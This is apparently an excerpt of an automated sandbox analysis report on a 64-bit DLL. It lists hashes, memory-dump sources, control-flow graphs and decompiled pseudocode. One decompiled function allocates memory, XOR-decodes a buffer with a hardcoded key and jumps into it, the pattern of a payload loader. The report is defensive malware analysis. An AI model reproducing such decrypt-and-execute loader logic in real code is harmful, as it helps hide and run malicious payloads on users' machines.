                                                                      • Instruction Fuzzy Hash: 1322F7715057C8CBEBBACFA4D899ACD7BA8FB44B44F10161DE84AEE290CBB45745CB01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0g$`/$eU
                                                                      • API String ID: 0-1869587935
                                                                      • Opcode ID: e42517781b4c5a6e2395bcec890ae724bc5a418ada587a66dde62167571468c0
                                                                      • Instruction ID: 7cd7da0cbef469045b8093e79a2c7f0851e9700130cc3e30bbf9d9ab606c4a40
                                                                      • Opcode Fuzzy Hash: e42517781b4c5a6e2395bcec890ae724bc5a418ada587a66dde62167571468c0
                                                                      • Instruction Fuzzy Hash: 3061AA715187408FD368DF29C58A51BBBF1FBC6744F004A1DF68A862A4D7B6D809CB47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID: L[
                                                                      • API String ID: 963392458-3786185354
                                                                      • Opcode ID: 806773b70e7ab706d630f49173ef1c4c2e45366edcb4d6d18c8755d8a62b8c06
                                                                      • Instruction ID: 4ea6782ae32f6ee9d85ce34738037e6352f4cbd65d93221081483ffec787e6b0
                                                                      • Opcode Fuzzy Hash: 806773b70e7ab706d630f49173ef1c4c2e45366edcb4d6d18c8755d8a62b8c06
                                                                      • Instruction Fuzzy Hash: 0351077051C7858FE778DF18D48A7AABBE0FB88315F104A2EE49DC7255DB749884CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: w@
                                                                      • API String ID: 0-3933844196
                                                                      • Opcode ID: 5e190d2b37476e442a844b01a1e6e2b4e7978620d8c54b7cf5e7142be065b825
                                                                      • Instruction ID: c5c0aa8e796d77f9bf853b778f8900bbc4d02dcd99486cf78b22d23f822b6e95
                                                                      • Opcode Fuzzy Hash: 5e190d2b37476e442a844b01a1e6e2b4e7978620d8c54b7cf5e7142be065b825
                                                                      • Instruction Fuzzy Hash: 445218B1E0470D8FDB58CFA8D45A9EEBBF2FB48344F004129D846B6290D7B4591ACF99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :q:\
                                                                      • API String ID: 0-2895447576
                                                                      • Opcode ID: 886945f031e67b58a868bdb1e381ef4a9fc1c96ab49a30106b080c815137e49d
                                                                      • Instruction ID: d5a3f87f24b1b2466f7cc0396cf99fabef0adf8e2b826b9f4ffb1733c61a25df
                                                                      • Opcode Fuzzy Hash: 886945f031e67b58a868bdb1e381ef4a9fc1c96ab49a30106b080c815137e49d
                                                                      • Instruction Fuzzy Hash: 9B22F0B1510688EFDB98CF28C8DA99D3BA1FB44394F906229FD46872A0D775D885CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: lr
                                                                      • API String ID: 0-916072004
                                                                      • Opcode ID: fa212b8693eb9b32a65a2385a5ea898d40d4b6b25daee9b6546e8f2daae18533
                                                                      • Instruction ID: c4acf700df492eaa974d9b0d575e6b29ec6d2c4946a01ef678e1b89e8a181664
                                                                      • Opcode Fuzzy Hash: fa212b8693eb9b32a65a2385a5ea898d40d4b6b25daee9b6546e8f2daae18533
                                                                      • Instruction Fuzzy Hash: 46A17B701597849FE7E8CF24C8D9ADA7BE0FB94700F901A2DF8868B2A0C775D945CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0OX
                                                                      • API String ID: 0-2247774083
                                                                      • Opcode ID: cbe327959dac0143b50e131ebb10b63ebbb26e3c7b73c3fb7901bf4345a69007
                                                                      • Instruction ID: 089b16df3b56efaeb14b33816074ddeb71d166930486ca99646e92fea1b5a9c8
                                                                      • Opcode Fuzzy Hash: cbe327959dac0143b50e131ebb10b63ebbb26e3c7b73c3fb7901bf4345a69007
                                                                      • Instruction Fuzzy Hash: 136115719047488FDB48CFA8D9894DDBBF0FB4C308F114269E84AB72A1D7789905CF59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: da89834e882f0b4855d718ede20227958668c4a92cd0dbbcecb631bd8131a94a
                                                                      • Instruction ID: 915a0bca570aab86b06d2207c3eeab85db111dc78b6bdea13d914cca3ed9bec4
                                                                      • Opcode Fuzzy Hash: da89834e882f0b4855d718ede20227958668c4a92cd0dbbcecb631bd8131a94a
                                                                      • Instruction Fuzzy Hash: C7811A7011064ACFDB48DF28D89A5DA3FE0FB58398F511229FC4A972A0C778D595CBC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 84%
                                                                      			E00000001180001E0C() {
                                                                      				signed long long _t8;
                                                                      				void* _t11;
                                                                      				void* _t12;
                                                                      				void* _t14;
                                                                      				signed long long _t15;
                                                                      				intOrPtr _t16;
                                                                      				void* _t17;
                                                                      				void* _t18;
                                                                      				void* _t19;
                                                                      
                                                                      				_t15 = _t14 - 0x3d0;
                                                                      				_t8 =  *0x80070098; // 0xd02b0a549a3
                                                                      				 *(_t14 - 0x2d0 + 0x2c0) = _t8 ^ _t15;
                                                                      				_t16 =  *0x80070cd8; // 0x1942a670000
                                                                      				r9d = 0x15b6f;
                                                                      				 *((long long*)(_t15 + 0x20)) = "OPXDZsqAzHjvGTdEqw";
                                                                      				E00000001180001590(0x1ea5, _t11, _t12, _t16, _t17, _t18, _t19); // executed
                                                                      				ExitProcess(??);
                                                                      			}












                                                                      0x180001e16
                                                                      0x180001e1d
                                                                      0x180001e27
                                                                      0x180001e2e
                                                                      0x180001e3c
                                                                      0x180001e42
                                                                      0x180001e51
                                                                      0x180001e56

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Value$Close$CreateDeleteExitFileModuleNameProcess
                                                                      • String ID: OPXDZsqAzHjvGTdEqw
                                                                      • API String ID: 1704997075-1865718181
                                                                      • Opcode ID: 3950ca9deb4323522b375455de36fa7ff33fd3590fcfb785640776e1a3bb85fb
                                                                      • Instruction ID: 63a891c2f900980e6607cc3424fc366237d0ca6d1189310c722c4d8ed4b96dc4
                                                                      • Opcode Fuzzy Hash: 3950ca9deb4323522b375455de36fa7ff33fd3590fcfb785640776e1a3bb85fb
                                                                      • Instruction Fuzzy Hash: C9414972214A89C6EBA1CB61E8447DA73A4F7887D8F409216B94D47BA8DF7DC24DCB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 161 180002910-180002916 162 180002951-18000295b 161->162 163 180002918-18000291b 161->163 164 180002a78-180002a8d 162->164 165 180002945-180002984 call 180003628 163->165 166 18000291d-180002920 163->166 169 180002a9c-180002ab6 call 1800034bc 164->169 170 180002a8f 164->170 181 180002a52 165->181 182 18000298a-18000299f call 1800034bc 165->182 167 180002922-180002925 166->167 168 180002938 __scrt_dllmain_crt_thread_attach 166->168 173 180002931-180002936 call 18000356c 167->173 174 180002927-180002930 167->174 177 18000293d-180002944 168->177 184 180002ab8-180002aed call 1800035e4 call 1800033e8 call 180003b00 call 180003798 call 1800037bc call 180003614 169->184 185 180002aef-180002b20 call 18000386c 169->185 175 180002a91-180002a9b 170->175 173->177 186 180002a54-180002a69 181->186 194 1800029a5-1800029b6 call 18000352c 182->194 195 180002a6a-180002a77 call 18000386c 182->195 184->175 196 180002b31-180002b37 185->196 197 180002b22-180002b28 185->197 213 180002a07-180002a11 call 180003798 194->213 214 1800029b8-1800029d5 call 180003ac4 call 1800033d8 call 1800033fc call 180039d40 194->214 195->164 198 180002b39-180002b43 196->198 199 180002b7e-180002b86 call 180001af0 196->199 197->196 203 180002b2a-180002b2c 197->203 204 180002b45-180002b4d 198->204 205 180002b4f-180002b5d 198->205 215 180002b8b-180002b94 199->215 210 180002c1f-180002c2c 203->210 211 180002b63-180002b6b call 180002910 204->211 205->211 225 180002c15-180002c1d 205->225 227 180002b70-180002b78 211->227 213->181 233 180002a13-180002a1f call 18000385c 213->233 257 1800029da-1800029dc 214->257 221 180002b96-180002b98 215->221 222 180002bcc-180002bce 215->222 221->222 230 180002b9a-180002bbc call 180001af0 call 180002a78 221->230 223 180002bd5-180002bea call 180002910 222->223 224 180002bd0-180002bd3 222->224 223->225 242 180002bec-180002bf6 223->242 224->223 224->225 225->210 227->199 227->225 230->222 255 180002bbe-180002bc3 230->255 251 180002a21-180002a2b call 180003700 233->251 252 180002a45-180002a50 233->252 248 180002c01-180002c11 242->248 249 180002bf8-180002bff 242->249 248->225 249->225 251->252 261 180002a2d-180002a3b 251->261 252->186 255->222 257->213 260 1800029de-1800029e5 __scrt_dllmain_after_initialize_c 257->260 260->213 262 1800029e7-180002a04 call 180039cfc 260->262 261->252 262->213
                                                                      C-Code - Quality: 100%
                                                                      			E00000001180002910(void* __edx) {
                                                                      				void* _t5;
                                                                      
                                                                      				_t5 = __edx;
                                                                      				if (_t5 == 0) goto 0x80002951;
                                                                      				if (_t5 == 0) goto 0x80002945;
                                                                      				if (_t5 == 0) goto 0x80002938;
                                                                      				if (__edx == 1) goto 0x80002931;
                                                                      				return 1;
                                                                      			}




                                                                      0x180002914
                                                                      0x180002916
                                                                      0x18000291b
                                                                      0x180002920
                                                                      0x180002925
                                                                      0x180002930

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 2473b6abd498bc33680f3f13fe520f5e2ecc38c18d0596e8373dd282128b670a
                                                                      • Instruction ID: 61cf0ea26cacccb345a1af573f9f0d533fa6da20b80700140cfc11ce11cd1d1f
                                                                      • Opcode Fuzzy Hash: 2473b6abd498bc33680f3f13fe520f5e2ecc38c18d0596e8373dd282128b670a
                                                                      • Instruction Fuzzy Hash: D381D27170064D86FBE7EB6694823D97294AB8E7C0F54C026B94947397DF39CB4E8701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 57%
                                                                      			E00000001180001AF0(void* __edx, long long __rbx, long long __rcx, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, signed long long __r11, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v24;
                                                                      				signed int _v40;
                                                                      				void* _v3016;
                                                                      				signed int _v3024;
                                                                      				intOrPtr _v3032;
                                                                      				void* __rdi;
                                                                      				void* _t35;
                                                                      				intOrPtr _t38;
                                                                      				void* _t44;
                                                                      				signed int _t130;
                                                                      				signed int _t131;
                                                                      				signed int _t133;
                                                                      				signed int _t134;
                                                                      				signed long long _t145;
                                                                      				signed long long _t146;
                                                                      				long long _t148;
                                                                      				void* _t149;
                                                                      				signed long long _t151;
                                                                      				signed long long _t157;
                                                                      				void* _t165;
                                                                      				void* _t170;
                                                                      				signed long long _t171;
                                                                      				void* _t173;
                                                                      				long long _t178;
                                                                      				signed long long _t180;
                                                                      				long long _t182;
                                                                      
                                                                      				_t180 = __r11;
                                                                      				_t173 = __r8;
                                                                      				_t148 = __rbx;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_a32 = __rsi;
                                                                      				_t171 = _t170 - 0xbe0;
                                                                      				_t145 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_t146 = _t145 ^ _t171;
                                                                      				_v40 = _t146;
                                                                      				_t182 = __rcx;
                                                                      				if (__edx != 1) goto 0x80001dda;
                                                                      				r8d = 0xb9d;
                                                                      				E00000001180003FF0();
                                                                      				_t35 = E000000011800399A4(_t146, __rbx, "45662311", _t165, __rsi, __r8, __r10);
                                                                      				E00000001180002854(0x8005d6a0, __r9); // executed
                                                                      				if (_t146 == 0) goto 0x80001dd6;
                                                                      				 *((char*)(_t148 + _t146)) = 0;
                                                                      				_t149 = _t148 + 1;
                                                                      				if (_t149 - _t165 < 0) goto 0x80001b6d;
                                                                      				E0000000118000285C(0x8005d6a0, __r9); // executed
                                                                      				if (_t149 != _t165) goto 0x80001dd6;
                                                                      				 *0x8007003c =  *0x8007003c & 0x00000000;
                                                                      				_t157 = L"64";
                                                                      				 *0x80070040 =  *0x80070040 & 0x00000000;
                                                                      				 *0x80070044 =  *0x80070044 & 0x00000000;
                                                                      				 *0x8007004c =  *0x8007004c & 0x00000000;
                                                                      				 *0x80070048 =  *0x80070048 & 0x00000000;
                                                                      				 *0x80070050 =  *0x80070050 & 0x00000000;
                                                                      				_t38 = E000000011800393EC(_t146, _t149, _t157, _t165, _t173, __r10);
                                                                      				r11d =  *0x80070050; // 0x0
                                                                      				r8d =  *0x80070048; // 0x0
                                                                      				r9d =  *0x80070044; // 0x0
                                                                      				r10d =  *0x8007003c; // 0x0
                                                                      				_t44 = GetCurrentProcess();
                                                                      				_v3024 = _v3024 & 0x00000000;
                                                                      				r9d = 0x8005d6a0 + _t146 * 0x00000002 | 0x00001000 + _t157 * 0x00000002;
                                                                      				_v3032 = _t38;
                                                                      				__imp__VirtualAllocExNuma(); // executed
                                                                      				_t151 = _t146;
                                                                      				r8d = 0x18005d6d0;
                                                                      				E000000011800046A0(_t44, 0, 0x80070cb0, 0x8005d6a0, 0x2b8cc04);
                                                                      				_t130 =  *0x80070050; // 0x0
                                                                      				_t178 = "S+Z!sX0^Mwg%>F>B^qkxqr^aAiDNyxSV";
                                                                      				_t133 =  *0x80070044; // 0x0
                                                                      				r8d =  *0x80070040; // 0x0
                                                                      				r15d =  *0x80070048; // 0x0
                                                                      				r11d =  *0x8007004c; // 0x0
                                                                      				 *0x80070cb0 = _t182;
                                                                      				r14d = 0;
                                                                      				 *0x80070cb8 = _t178;
                                                                      				 *0x80070cc0 = 0x21;
                                                                      				 *0x80070cc8 = 0xc70a;
                                                                      				 *0x80070cd0 = 0x17;
                                                                      				if (r15d * r8d - (_t130 * _t133 + r8d) * _t133 - _t180 + _t180 - _t130 + 0x2b8cc04 <= 0) goto 0x80001dc3;
                                                                      				r9d =  *0x8007003c; // 0x0
                                                                      				r11d = r11d - (_t130 * r15d * r11d * r9d + _t133) * r9d;
                                                                      				r11d = r11d - _t130;
                                                                      				r11d = r11d + _t133;
                                                                      				r14d = r14d + 1;
                                                                      				 *(_t182 + _t180 * 2 + _t151) =  *(_t171 + r14d - (r11d * r11d * r8d * r8d * r9d + r15d) * r8d - _t130 - r15d - r11d + _t133 + 0x30) ^  *(r14d - ((0x3e0f83e1 * r14d >> 0x20 >> 3) + (0x3e0f83e1 * r14d >> 0x20 >> 3 >> 0x1f)) * 0x21 + _t178);
                                                                      				_t131 =  *0x80070050; // 0x0
                                                                      				_t134 =  *0x80070044; // 0x0
                                                                      				r8d =  *0x80070040; // 0x0
                                                                      				r15d =  *0x80070048; // 0x0
                                                                      				r11d =  *0x8007004c; // 0x0
                                                                      				if (r14d - r15d * r8d - (_t131 * _t134 + r8d) * _t134 - _t180 + _t180 - _t131 + 0x2b8cc04 - _t35 >= 0) goto 0x80001dc3;
                                                                      				goto 0x80001cf0;
                                                                      				 *_t151();
                                                                      				if ( *0x80070cd8 != 0) goto 0x80001dda;
                                                                      				goto 0x80001ddf;
                                                                      				return E000000011800028F0(1, r15d * r8d - (_t131 * _t134 + r8d) * _t134 - _t180 + _t180 - _t131 + 0x2b8cc04 - _t35, _v40 ^ _t171);
                                                                      			}





























                                                                      0x180001af0
                                                                      0x180001af0
                                                                      0x180001af0
                                                                      0x180001af0
                                                                      0x180001af5
                                                                      0x180001afa
                                                                      0x180001b04
                                                                      0x180001b0b
                                                                      0x180001b12
                                                                      0x180001b15
                                                                      0x180001b1d
                                                                      0x180001b23
                                                                      0x180001b2e
                                                                      0x180001b3b
                                                                      0x180001b47
                                                                      0x180001b58
                                                                      0x180001b60
                                                                      0x180001b6d
                                                                      0x180001b70
                                                                      0x180001b76
                                                                      0x180001b7b
                                                                      0x180001b83
                                                                      0x180001b89
                                                                      0x180001b90
                                                                      0x180001b97
                                                                      0x180001b9e
                                                                      0x180001ba5
                                                                      0x180001bac
                                                                      0x180001bb3
                                                                      0x180001bba
                                                                      0x180001bbf
                                                                      0x180001bc8
                                                                      0x180001bd2
                                                                      0x180001bdc
                                                                      0x180001c3b
                                                                      0x180001c41
                                                                      0x180001c46
                                                                      0x180001c4c
                                                                      0x180001c55
                                                                      0x180001c64
                                                                      0x180001c67
                                                                      0x180001c6b
                                                                      0x180001c70
                                                                      0x180001c76
                                                                      0x180001c7d
                                                                      0x180001c85
                                                                      0x180001c8c
                                                                      0x180001c96
                                                                      0x180001ca4
                                                                      0x180001cab
                                                                      0x180001cb2
                                                                      0x180001cb9
                                                                      0x180001cc4
                                                                      0x180001cd2
                                                                      0x180001cea
                                                                      0x180001cf0
                                                                      0x180001d5d
                                                                      0x180001d60
                                                                      0x180001d63
                                                                      0x180001d6a
                                                                      0x180001d70
                                                                      0x180001d73
                                                                      0x180001d7b
                                                                      0x180001d81
                                                                      0x180001d88
                                                                      0x180001d92
                                                                      0x180001db5
                                                                      0x180001dbe
                                                                      0x180001dca
                                                                      0x180001dd4
                                                                      0x180001dd8
                                                                      0x180001e0b

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: AllocCurrentNumaProcessVirtual
                                                                      • String ID: 45662311$S+Z!sX0^Mwg%>F>B^qkxqr^aAiDNyxSV
                                                                      • API String ID: 346376999-3951590949
                                                                      • Opcode ID: 29f87943e0751d83b164f25a66cb79c7386ca0b4a54ca12213906f56e78ebf8b
                                                                      • Instruction ID: 03e643bd6b656ffe0902f65e4295077c755dfa93048facdfd5e12145c7bb20e6
                                                                      • Opcode Fuzzy Hash: 29f87943e0751d83b164f25a66cb79c7386ca0b4a54ca12213906f56e78ebf8b
                                                                      • Instruction Fuzzy Hash: E881E232220288CAE78ADF24E9147E477A5B39C7D5F15D21AB90A977A4DF3DCA0CC740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 478 180041cf8-180041d13 479 180041d16-180041d3f 478->479 480 180041d41-180041d46 479->480 481 180041d4b-180041d54 479->481 482 180041dd6-180041ddf 480->482 483 180041d56-180041d59 481->483 484 180041d6c 481->484 482->479 485 180041de5-180041dff 482->485 486 180041d65-180041d6a 483->486 487 180041d5b-180041d63 483->487 488 180041d71-180041d82 GetStdHandle 484->488 486->488 487->488 489 180041db1-180041dc9 488->489 490 180041d84-180041d8f GetFileType 488->490 489->482 492 180041dcb-180041dcf 489->492 490->489 491 180041d91-180041d9c 490->491 493 180041da5-180041da8 491->493 494 180041d9e-180041da3 491->494 492->482 493->482 495 180041daa-180041daf 493->495 494->482 495->482
                                                                      C-Code - Quality: 37%
                                                                      			E00000001180041CF8(void* __ecx, long long __rbx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                      				signed char _t53;
                                                                      				signed int _t54;
                                                                      				void* _t73;
                                                                      				long long _t77;
                                                                      				intOrPtr _t78;
                                                                      				void* _t95;
                                                                      				long _t98;
                                                                      
                                                                      				_t73 = _t95;
                                                                      				 *((long long*)(_t73 + 8)) = __rbx;
                                                                      				 *((long long*)(_t73 + 0x10)) = __rbp;
                                                                      				 *((long long*)(_t73 + 0x18)) = __rsi;
                                                                      				 *((long long*)(_t73 + 0x20)) = __rdi;
                                                                      				r14d = 0;
                                                                      				_t77 =  *((intOrPtr*)(0x180071868)) + 2;
                                                                      				if (_t77 - 1 <= 0) goto 0x80041d4b;
                                                                      				 *0x180071878 =  *0x180071878 | 0x00000080;
                                                                      				goto 0x80041dd6;
                                                                      				 *0x180071878 = 0x81;
                                                                      				if (0 == 0) goto 0x80041d6c;
                                                                      				if (0 == 0) goto 0x80041d65;
                                                                      				goto 0x80041d71;
                                                                      				goto 0x80041d71;
                                                                      				GetStdHandle(_t98);
                                                                      				_t21 = _t77 + 1; // 0x1
                                                                      				if (_t21 - 1 <= 0) goto 0x80041db1;
                                                                      				_t53 = GetFileType(??); // executed
                                                                      				if (_t53 == 0) goto 0x80041db1;
                                                                      				_t54 = _t53 & 0x000000ff;
                                                                      				 *((long long*)(0x180071868)) = _t77;
                                                                      				if (_t54 != 2) goto 0x80041da5;
                                                                      				 *0x180071878 =  *0x180071878 | 0x00000040;
                                                                      				goto 0x80041dd6;
                                                                      				if (_t54 != 3) goto 0x80041dd6;
                                                                      				 *0x180071878 =  *0x180071878 | 0x00000008;
                                                                      				goto 0x80041dd6;
                                                                      				 *0x180071878 =  *0x180071878 | 0x00000040;
                                                                      				 *((long long*)( *0x185DDF5A8 + 0x28)) = 0xfffffffe;
                                                                      				_t78 =  *0x80071810; // 0x0
                                                                      				if (_t78 == 0) goto 0x80041dd6;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t98 + _t78)) + 0x18)) = 0xfffffffe;
                                                                      				if (1 != 3) goto 0x80041d16;
                                                                      				return _t54;
                                                                      			}










                                                                      0x180041cf8
                                                                      0x180041cfb
                                                                      0x180041cff
                                                                      0x180041d03
                                                                      0x180041d07
                                                                      0x180041d13
                                                                      0x180041d37
                                                                      0x180041d3f
                                                                      0x180041d41
                                                                      0x180041d46
                                                                      0x180041d4b
                                                                      0x180041d54
                                                                      0x180041d59
                                                                      0x180041d63
                                                                      0x180041d6a
                                                                      0x180041d71
                                                                      0x180041d7a
                                                                      0x180041d82
                                                                      0x180041d87
                                                                      0x180041d8f
                                                                      0x180041d91
                                                                      0x180041d94
                                                                      0x180041d9c
                                                                      0x180041d9e
                                                                      0x180041da3
                                                                      0x180041da8
                                                                      0x180041daa
                                                                      0x180041daf
                                                                      0x180041db1
                                                                      0x180041db6
                                                                      0x180041dbf
                                                                      0x180041dc9
                                                                      0x180041dcf
                                                                      0x180041ddf
                                                                      0x180041dff

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: FileHandleType
                                                                      • String ID:
                                                                      • API String ID: 3000768030-0
                                                                      • Opcode ID: da0e588d4e34d04f6001cb7c7754b1e7775e6a953fb97c7e1226ae594b52272a
                                                                      • Instruction ID: 8a2e491fa296d90bb0a413cb51c3bb791384a8d468fee7bd58b022314414d815
                                                                      • Opcode Fuzzy Hash: da0e588d4e34d04f6001cb7c7754b1e7775e6a953fb97c7e1226ae594b52272a
                                                                      • Instruction Fuzzy Hash: 3331D172A10F4895EBA18B1599C03E82A50F34DBF5F6A430AFB6A073E0CF35D6A5C344
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 68%
                                                                      			E0000000118003F8F4(intOrPtr* __rax, void* __rcx) {
                                                                      				int _t1;
                                                                      				intOrPtr _t3;
                                                                      				void* _t4;
                                                                      				void* _t11;
                                                                      				intOrPtr _t14;
                                                                      
                                                                      				if (__rcx == 0) goto 0x8003f92f;
                                                                      				_t14 =  *0x80072088; // 0x19428c60000, executed
                                                                      				_t1 = HeapFree(_t11, ??); // executed
                                                                      				if (_t1 != 0) goto 0x8003f92a;
                                                                      				_t3 = E00000001180013A44(GetLastError(), __rax, _t14, __rcx);
                                                                      				_t4 = E00000001180013B18(__rax);
                                                                      				 *__rax = _t3;
                                                                      				return _t4;
                                                                      			}








                                                                      0x18003f8f7
                                                                      0x18003f903
                                                                      0x18003f90a
                                                                      0x18003f912
                                                                      0x18003f91c
                                                                      0x18003f923
                                                                      0x18003f928
                                                                      0x18003f92f

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
